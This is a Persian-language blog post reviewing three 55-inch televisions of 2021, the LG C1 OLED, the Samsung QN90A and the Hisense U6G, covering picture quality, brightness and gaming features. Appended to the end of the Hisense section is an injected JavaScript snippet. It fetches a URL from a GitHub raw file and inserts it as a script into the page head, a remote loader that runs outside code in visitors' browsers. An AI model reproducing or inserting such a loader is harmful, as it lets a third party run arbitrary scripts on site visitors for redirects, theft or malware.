دسته‌بندی نشده

بررسی بهترین تلویزیون های 2021 در سایز 55 اینچ

اگرچه امروزه تلویزیون ها 65 اینچ و بزرگ تر بسیار مشهور شده اند اما اندزه 55 اینچ تلویزیون ها هنوز به عنوان محبوب ترین و کاربردی ترین سایز در بین کاربران شناخته می شود. خرید یک تلویزیون 55 اینچ به نیاز شما از تلویزیون و کاربردی که برایتان دارد بستگی دارد. اگر تلویزیون را برای تماشا فیلم در اتاق های تاریک می خواهید تلویزیون های OLED می تواند گزینه مناسبی برایتان باشد. اگر می خواهید از تلویزین در اتاق های روشن و پر نور استفاده کنید می توانید به سراغ پنل های LED بروید. درکل می توان گفت هیچ تلویزیون بی عیب و نقص و کاملا پرفکتی وجود ندارد و انتخاب ان ها بستگی به نیاز و سلیقه افراد دارد. 

بهترین گزینه 55 اینچ در دسته OLED

ال جی C1

تلویزیون 55 اینچ ال جی مدل OLED55C1PUB از بهترین تلویزیون ها در رده اولد می باشد. این تلویزیون تصاویری عالی را در اتاق های تاریک نمایش می دهد. در پنل های OLED هر پیکسل به صورت تکی خاموش می شود و می تواند بهترین عملکرد را برای صحنه های تاریک با عمق بسیار زیاد ایجاد کند. این ویژگی تلویزیون را به بهترین گزینه برای تماشا فیلم در اتاق های تاریک تبدیل می کند. پیکسل های تک کاره این پنل ها نور را به خوبی در قسمت های کناری کنترل می کنند و زاویه دید گسترده را برای تلویزیون به ارمغان می اورند. زاویه دید گسترده این تلویزیون مناسب برای تماشا شو ها و مسابقات مختلف با تعداد افرادی زیادی می باشد چراکه در هر قسمت از اتاق محتوا به خوبی روی تلویزیون مشاهده خواهد شد. با کنترل بسیار خوبی که این تلویزیون بر روی حرکات دارد و با پاسخگویی مناسبی که در سرعت های مختلف دارد محتویات پر سرعت به صورت روان و شفاف روی نمایشگر پخش خواهد شد. با وجود ورودی های HDMI 2.1 و تاخیر ورودی پایین و همچنین قابلیت VRR انجام بازی های روز دنیا با سرعت بالا روی تلویزیون پشتیبانی می شود, این قابلیت می تواند گیمر ها را بسیار راضی و خشنود نگهدارد. نقد و بررسی دقیق تلویزیون C1 ال جی را در این لینک می توانید مشاهده کنید. 

بهترین گزینه 55 اینچ در دسته LED

QN90A سامسونگ 

تلویزیون 55 اینچ سامسونگ مدل QN55QN90AAFXZA یک گزینه بسیار عالی و مناسب در رده تلویزیون های LED می باشد. اگر دائما نگران سوختگی پنل های اولد خود هستید چراکه امری دور از انتظار در این تلویزیون ها نیست انتخاب و ترجیح  تلویزیون ال ای دی بجای OLED بسیار مناسب است. در این تلویزیون از نور های پس زمینه Mini LED استفاده شده است که روشنایی بسیار بیشتر از تلویزیون ال جی دارد. در این تلویزیون انعکاس و بازتاب نور به صورتی عالی کنترل می شود بنابراین می توان از ان در اتاق های پر نور و روشن استفاده کرد. این تلویزیون از قابلیت های گیمینگ مختلف مانند ورودی HDMI 2.1, سازگاری با G-SYNC و FreeSync جهت کاهش قطعی تصویر و VRR پشتیبانی می شود. همچنین با پاسخگویی سریعی که این تلویزیون دارد حرکات به صورت روان و شفاف پخش می شوند. تاخیر ورودی پایین Q90A تجربه گیمینگ عالی را ایجاد خواهد کرد. از نظر کیفیت تصویر این تلویزیون با استفاده از پنل VA دارای نسبت کنتراست مناسب برای رنگ های مشکی عمیق می باشد و همچنین قابلیت لوکال دیمینگ به ایجاد صحنه های عمیق تر کمک می کند. با وجود تکنولوژی زاویه دید گسترده اختصاصی سامسونگ این تلویزیون تصاویر را در زوایا مختلف به زیبایی پخش می کند. 

بهترین گزینه 55 اینچ در دسته اقتصادی و هزینه مناسب

هایسنس U6G

اگر به دنبال یک تلویزیون با قیمت مناسب و کارایی خوب هستید تلویزیون 55U6G هایسنس می تواند انتخابی خوب و مناسب برایتان باشد. این تلویزیون 4K یک تلویزیون عالی محسوب می شود و از نظر کارایی به برخی تلویزیون های گران قیمت نزدیک می باشد تنها با این تفاوت که تکنولوژی های بالا رده در ان پیدا نمی شود. این تلویزیون با پلتفرم اندروید و قابلیت های هوشمند عرضه می شود و بسیاری از اپلیکیشن ها از طریق گوگل پلی استور روی ان قابل اجرا و دانلود می باشند. در این تلویزیون از پنل VA با نسبت کنتراست عالی و قابلیت full-array لوکال دیمینگ برای ایجاد رنگ های مشکی فوق العاده و عمیق استفاده شده است. این تلویزیون گزینه ای مناسب برای تماشا فیلم است و هیچ مشکلی در ارتقا محتویات 1080o و 480p در ان وجود ندارد. همچنین این تلویزیون 55 اینچ از فرمت های HDR10 و Dolby Vision پشتیبانی می کند  و طیف رنگی گسترده ای را روی نمایشگر به اجرا در می اورد. تنها مشکلی که در پخش محتوا HDR روی این نمایشگر وجود دارد این است که به اندازه ای روشن نمی شود که تمام جزئیات صحنه را پخش و نمایش دهد. در این تلویزیون قابلیت های گیمینگ پشتیبانی نخواهند شد.  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *